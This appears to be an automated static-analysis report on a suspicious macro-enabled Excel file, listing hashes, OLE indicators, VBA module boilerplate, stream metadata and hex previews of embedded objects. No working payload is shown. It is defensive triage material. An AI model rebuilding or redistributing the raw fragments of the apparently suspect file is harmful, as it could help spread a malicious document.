                                                                                                                                                                                  SHA512:b3e126d38ea54f5ba5014310ad98301a157859907197ba2d96e16c2b9515d37d45456c218c547b2f629381cd1feaaeaf2c979be936b3e4afa2c6fc2ca74d7351
                                                                                                                                                                                  SSDEEP:12288:6mzHJEUiOIBUzMTSGD3DERnLRmF8DREPXxpsAQx1Zj+jMEP706By9T/avncgxx6P:9BafbARM8YX8Z+jz7vBy9T/8cgD6g2
                                                                                                                                                                                  TLSH:0C25F1D1B28DAB12DA45023579F387AE1721AC13D912467B33F8731E6AF7AD08503F96
                                                                                                                                                                                  File Content Preview:........................>.......................................................................5...6...7...............g.......i.......k......................................................................................................................

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:276ea3a6a6b7bfbf

                                                                                                                                                                                  Static OLE Info

                                                                                                                                                                                  General

                                                                                                                                                                                  Document Type:OLE
                                                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                                                  OLE File "0200011080.xls"

                                                                                                                                                                                  Indicators
                                                                                                                                                                                  Has Summary Info:
                                                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                                                  Encrypted Document:True
                                                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                                                  Contains ObjectPool Stream:False
                                                                                                                                                                                  Flash Objects Count:0
                                                                                                                                                                                  Contains VBA Macros:True
                                                                                                                                                                                  Summary
                                                                                                                                                                                  Code Page:1252
                                                                                                                                                                                  Author:
                                                                                                                                                                                  Last Saved By:
                                                                                                                                                                                  Create Time:2006-09-16 00:00:00
                                                                                                                                                                                  Last Saved Time:2024-12-03 10:44:25
                                                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                                                  Security:1
                                                                                                                                                                                  Document Summary
                                                                                                                                                                                  Document Code Page:1252
                                                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                                                  Contains Dirty Links:False
                                                                                                                                                                                  Shared Document:False
                                                                                                                                                                                  Changed Hyperlinks:False
                                                                                                                                                                                  Application Version:786432

                                                                                                                                                                                  Streams with VBA

                                                                                                                                                                                  VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                                  VBA File Name:Sheet1.cls
                                                                                                                                                                                  Stream Size:977
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  VBA Code
                                                                                                                                                                                  Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                  VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                                  VBA File Name:Sheet2.cls
                                                                                                                                                                                  Stream Size:977
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  VBA Code
                                                                                                                                                                                  Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                                  VBA File Name:ThisWorkbook.cls
                                                                                                                                                                                  Stream Size:985
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  VBA Code
                                                                                                                                                                                  Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                  VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                                  VBA File Name:Sheet1.cls
                                                                                                                                                                                  Stream Size:977
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? g . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 3f 67 f9 07 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  VBA Code
                                                                                                                                                                                  Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                  VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                                  VBA File Name:Sheet2.cls
                                                                                                                                                                                  Stream Size:977
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 3f 67 80 fb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  VBA Code
                                                                                                                                                                                  Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                  VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                                  VBA File Name:Sheet3.cls
                                                                                                                                                                                  Stream Size:977
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? g . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 3f 67 8a 08 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  VBA Code
                                                                                                                                                                                  Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                                  VBA File Name:ThisWorkbook.cls
                                                                                                                                                                                  Stream Size:985
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? g . i . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 3f 67 1c 69 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  VBA Code
                                                                                                                                                                                  Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                  Streams

                                                                                                                                                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:\x1CompObj
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:114
                                                                                                                                                                                  Entropy:4.25248375192737
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:244
                                                                                                                                                                                  Entropy:2.889430592781307
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:200
                                                                                                                                                                                  Entropy:3.2920681057018664
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . J Q p E . . . . . . . . .
                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/\x1CompObj
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:114
                                                                                                                                                                                  Entropy:4.25248375192737
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/\x5DocumentSummaryInformation
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:244
                                                                                                                                                                                  Entropy:2.701136490257069
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/\x5SummaryInformation, File Type: data, Stream Size: 220
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/\x5SummaryInformation
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:220
                                                                                                                                                                                  Entropy:3.372234242231489
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD0018D4CE/\x1Ole
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:20
                                                                                                                                                                                  Entropy:0.5689955935892812
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:4
                                                                                                                                                                                  Entropy:0.8112781244591328
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . .
                                                                                                                                                                                  Data Raw:00 00 03 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD0018D4CE/Contents
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                                                                  Stream Size:197671
                                                                                                                                                                                  Entropy:6.989042939766534
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD0068D442/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD0068D442/\x1CompObj
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:114
                                                                                                                                                                                  Entropy:4.219515110876372
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD0068D442/Package, File Type: Microsoft Excel 2007+, Stream Size: 26243
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD0068D442/Package
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                  Stream Size:26243
                                                                                                                                                                                  Entropy:7.635433729726103
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD007203CB/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/\x1CompObj
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:114
                                                                                                                                                                                  Entropy:4.25248375192737
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
